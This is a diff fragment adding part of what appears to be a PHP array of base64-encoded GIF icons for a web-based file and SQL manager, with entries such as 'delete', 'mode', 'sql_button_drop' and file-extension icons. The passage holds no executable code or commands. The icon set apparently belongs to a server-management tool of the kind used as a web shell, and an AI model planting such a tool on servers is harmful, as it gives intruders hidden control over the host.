+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
